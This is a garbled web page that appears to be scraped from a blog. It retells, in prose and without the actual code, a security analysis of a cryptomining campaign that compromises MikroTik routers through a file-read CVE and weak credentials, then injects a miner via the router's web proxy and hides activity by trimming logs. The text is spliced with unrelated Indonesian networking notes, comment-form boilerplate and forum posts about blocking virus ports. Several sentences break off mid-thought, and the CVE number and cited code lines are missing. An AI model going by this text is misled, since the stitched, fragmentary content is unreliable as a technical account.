How is it possible that the same URL displays the real content after 10 milliseconds, and not the miner again? To understand how this works, we need to dive into the configuration of MikroTik routers. We got the configuration script that sets up the MikroTik router for this cryptomining campaign.
The infection starts by misusing CVE , a critical vulnerability that allows the attacker to get access to any file on the router without authorization or user interaction. In this case, the strain targets the file containing the database of credentials, allowing the attacker to log into your device.
While this is a serious vulnerability, it cannot be misused unless the attacker can connect to the management interface. Using either the aforementioned vulnerability or weak credentials, the attacker gains access to the router and then executes a multi-stage attack. The first thing he does is place a script on the router. Once there, the script is scheduled to run once every five minutes.
During this stage, a script called i First, the script tries to delete any previously scheduled jobs and scripts that run on the router including rules, schedules, and more. There is quite a long list full of various names of scripts to kill, which makes us think that this strain has been around for a while and has been modified as more and more jobs are added to its kill list.
Next, it remaps ports for TELNET and SSH access protocols to unusual ports to prevent easy detection and to prevent others from connecting to the administration interface of the router; it also opens these ports to the internet if they are not opened already.
As you will see in our analysis, this was not in the original script when the campaign began. The next step is to reset the proxy error page, which is later used for the miner payload, and to enable the web proxy itself.
It also adds a rule to ensure that any additional request to the proxy is denied, and the content of error. This redirects every request by any computer and other devices inside the network through a web proxy to an unsecured webpage HTTP.
Ok is a very important detail. Keep reading. This is another key line of code for the campaign to work. The two lines of code above tell the router to check every 15 seconds when it is connecting to an unsecured page HTTP , redirect the traffic through the proxy just once because as you are redirected, the IP address of your computer is added into the!
Ok list for another 15 seconds. Diagram of an example how the injection works. The next line assures us that this is a really malicious script:. It sets the logging to keep only the last line of the log.
This is obviously not a good practice for production use, but it allows the bad actor to stay under the radar so the administrator is not able to see the history of commands in the log files. The following line creates a SOCKS proxy server on a port which is based on the actual time of the router, which is random in that it uses minutes and seconds.
The next two lines download a malicious error. The iDDNS script is run every 5 minutes, and contains:. Like this: Like Loading Comments RSS feed. Leave a Reply Cancel reply Enter your comment here Fill in your details below or click an icon to log in:.
Email required Address never made public. Name required. Search for:. Pages About. Diasumsikan jalur utama melalui Wireless dengan jalur DSL sebagai back-up apabila jalur utama tidak dapat dilalui. Untuk mengecek apakah jalur utama dapat dilalui atau tidak, digunakan command ping. Bisa juga ditambahi config untuk failover, jd misal salahsatu speedy ada yg mati bisa langsung menggunakan speedy jalur satunya,. Atau dg alternatif lainnya yakni, kita membagi traffik ke dua jalur speedy tersebut berdasarkan group network di LAN kita,.
Dimana Kalau gak down ya langsung on 2 sekaligus, kayanya sih load balancing. You are commenting using your WordPress. You are commenting using your Google account. You are commenting using your Twitter account. You are commenting using your Facebook account. Notify me of new comments via email. Can you upload script with blocked virus ports from demo router to forum or somewhere else. Thu Jun 16, pm How do you export them and then import then into another MT box?
Thu Jun 16, pm Before few months I was already put on forum full code Thu Jun 16, pm thx. Wed Jul 06, pm Plz post virus-rules list for 2. Last edited by sergejs on Thu Jul 07, am, edited 1 time in total. Mon Jul 11, pm I suppose that p2p programs like emule or edonkey or bittorrent can also use these ports so that blocking virus like that can also block the peer to peer program.
0コメント